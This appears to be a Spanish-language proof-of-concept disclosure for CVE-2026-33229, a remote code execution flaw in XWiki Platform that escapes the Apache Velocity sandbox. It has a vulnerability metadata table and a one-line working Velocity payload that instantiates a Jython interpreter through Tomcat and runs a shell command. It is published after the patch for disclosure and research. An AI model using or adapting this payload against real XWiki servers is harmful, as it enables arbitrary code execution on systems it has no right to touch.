
Prueba de concepto del exploit para CVE-2026-33229, una RCE en XWiki mediante la evasión del sandbox de Apache Velocity, con detalles técnicos y un payload funcional.
Una vulnerabilidad de ejecución remota de código en XWiki Platform que permite a un usuario autenticado con permisos de scripting omitir por completo el sandbox de Apache Velocity — sin necesidad de Reflection en Java — mediante la navegación por objetos pre-instanciados ya presentes en el contexto de Velocity.
📄 Detalles técnicos completos: youssefazefzaf.com/posts/cve
| Campo | Valor |
|---|
| ID de CVE | CVE-2026-33229 |
| Producto afectado | XWiki Platform |
| Componente | Renderizador de macros Velocity, parámetro de título de página |
| Privilegios requeridos | Autenticado + permiso de Script |
| Impacto | Ejecución remota de código |
| GHSA | GHSA-h259-74h5-4rh9 |
| Descubierta | 7 de noviembre de 2025 |
| Parcheada | 10 de diciembre de 2025 |
| Divulgada | 8 de abril de 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Aviso de divulgación responsable: PoC publicada después de la disponibilidad del parche. No la utilices contra sistemas que no sean de tu propiedad.